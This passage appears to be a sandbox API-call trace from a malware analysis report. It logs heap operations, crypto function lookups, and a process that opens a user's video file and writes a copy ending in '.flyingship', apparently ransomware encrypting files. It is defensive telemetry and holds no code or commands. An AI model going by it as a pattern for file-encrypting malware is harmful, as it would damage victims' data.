lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0191.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0191.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0191.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0191.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0191.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0191.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0191.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0191.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0191.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0191.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0191.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0191.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0191.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0191.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d460 [0191.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x90d460, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0191.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0191.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0191.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0191.990] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDestroyHash") returned 0x74f2df66 [0191.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0191.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0191.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0191.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0191.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0191.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0191.991] CryptDestroyHash (hHash=0x90ae18) returned 1 [0191.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0191.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0191.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0191.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0191.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0191.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0191.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0191.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0191.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0191.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0191.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0191.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0191.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0191.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0191.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0191.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0191.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0191.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0191.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0191.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0191.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0191.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0191.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0191.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0191.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0191.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0191.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0191.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0191.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0191.993] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0ntyy6p\\-aawcghzf1n-uznr9.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0191.994] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.994] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0191.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0191.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0191.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0191.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0191.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0191.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0191.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0191.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0191.995] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.flyingship.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0ntyy6p\\-aawcghzf1n-uznr9.flyingship.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0192.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0192.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0192.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0192.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0192.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0192.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0192.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0192.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.000] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0192.000] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xfcbc, lpOverlapped=0x0) returned 1 [0192.003] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0192.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0192.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0192.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0192.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0192.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xfcbc) returned 0xbea018 [0192.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0192.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0192.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0192.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0192.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0192.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xfcbc) returned 0xbf9ce0 [0192.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0192.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0192.006] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0192.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0192.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27f8 [0192.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0192.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0192.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0192.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0192.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xfcbc) returned 0xbea018 [0192.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0192.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0192.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0192.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0192.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0192.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26d8 [0192.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0192.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0192.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0192.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2618 [0192.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0192.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0192.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0192.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda20 [0192.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0192.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0192.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0192.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0192.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0192.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xfcbc) returned 0xa5f008 [0192.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0192.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0192.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0192.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0192.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0192.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0192.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0192.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0192.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0192.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0192.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0192.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0192.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0192.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0192.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0192.009] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0192.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0192.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0192.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0192.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2848 [0192.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0192.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0192.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0192.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0192.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdac8 [0192.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0192.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0192.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0192.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0192.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0192.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0192.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0192.010] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0192.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0192.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0192.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0192.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0192.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0192.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0192.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0192.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0192.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0192.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0192.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0192.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0192.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0192.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0192.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0192.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0192.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0192.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0192.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0192.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0192.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0192.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0192.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0192.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.011] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0192.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0192.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0192.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0192.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0192.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0192.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0192.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0192.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0192.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0192.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0192.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0192.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0192.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0192.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0192.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0192.012] HeapFree (in: 